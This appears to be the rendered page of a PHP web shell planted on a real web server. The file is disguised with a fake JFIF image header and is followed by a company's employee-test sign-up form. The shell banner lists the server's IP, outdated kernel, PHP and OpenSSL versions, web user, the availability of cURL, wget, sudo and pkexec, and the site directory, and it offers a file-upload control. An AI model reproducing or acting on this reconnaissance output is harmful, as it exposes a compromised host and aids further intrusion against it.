????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 3.140.184.203 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/appsrv.astacus.se/new_employee2/ |
Upload File : |
<!doctype html> <html> <head> <meta charset="UTF-8"> <title>Astacus Employee Qualification</title> </head> <body> <table width="1200" border="0" cellspacing="0" cellpadding="0" align="center"> <tbody> <tr> <td align="center" style="font-family: Gotham, 'Helvetica Neue', Helvetica, Arial, sans-serif;"><p><center><span style="font-size: 36px">Welcome to the Astacus Employee Qualification webpage!</span></center> </p> </p><center> <p>Please enter your full name to enter the test.<br> <br> </p> </center> <form action="page1.php" method="post" name="form1" id="form1"> <table width="346" border="0" align="center" cellpadding="0" cellspacing="0"> <tbody> <tr> <td width="121">First name:</td> <td width="225" align="right"><input type="text" name="firstname" id="firstname"></td> </tr> <tr> <td>Last name:</td> <td align="right"><input type="text" name="lastname" id="lastname"></td> </tr> <tr> <td>E-mail:</td> <td align="right"><input type="text" name="mail" id="mail"></td> </tr> <tr> <td>Phone:</td> <td align="right"><input type="text" name="phone" id="phone"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" name="submit" id="submit" value="Enter test"></td> </tr> </tbody> </table> </form> <p> </p></td> </tr> </tbody> </table> </body> </html>